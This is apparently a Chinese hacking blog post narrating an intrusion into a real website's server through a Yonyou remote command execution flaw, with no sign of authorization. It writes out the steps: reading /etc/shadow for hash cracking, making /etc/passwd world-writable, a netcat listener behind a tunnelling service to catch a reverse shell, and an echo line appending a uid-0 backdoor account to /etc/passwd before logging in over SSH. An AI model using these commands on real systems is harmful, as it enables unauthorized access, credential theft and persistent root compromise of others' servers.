实战|记一次实战远程命令执行漏洞并提权

mxsillusion

​实战|记一次实战远程命令执行漏洞并提权[url=]HACK之道[/url] 2022-10-25 09:40 发表于重庆
收录于合集
#渗透实战49个
#提权3个
某站用友的命令执行漏洞，测试print hello发现可以执行命令

​

编辑
whami 和id 都查一波权限，发现是root，权限这么大，很好搞啊

​

编辑
ps -ef|grep sshd 查一波 发现可以ssh连接，直接useradd 用户，但是整个shell无法给用户添加密码，无法远程登录，怎么搞，直接读shadow哈希，爆破密码

​

编辑

​

编辑
爆破无结果，头大，怎么搞，思考5分钟，可以直接写passwd啊，试一波

​

编辑
再次查看shadow 居然没写进去，难道权限不对，ls -alrt /etc/passwd 发现权限是544 ，直接chmod 777 /etc/passwd 改权限，继续写，依然写不进去，换了各种姿势，都不行，难住我了，突然想起了nc反弹，一般linux都装有nc，这个有没有，查一波

​

编辑
果然不错，有nc，通过dnslog查一下是否有外连

​

编辑

​

编辑
能ping通，果然能外连，那就可以通过nc反弹搞一波了，本地的攻击机在内网，内网穿透一波
我一般用https://www.uulap.com/ 大家可以试试
将本地的6666端口映射到公网

​

编辑
本地建立监听 nc -l -n -v -p 6666

​

编辑
让目标机进行nc反弹

​

编辑
果然反弹回来了，直接上命令，加用户
echo ‘用户名RxM3nP3LOiYU:0:0:hello:/root:/bin/bash’ >> /etc/passwd

​

编辑
查看已经添加成功
直接ssh连接，发现是阿里云的服务器

​

编辑
至此结束收工！
​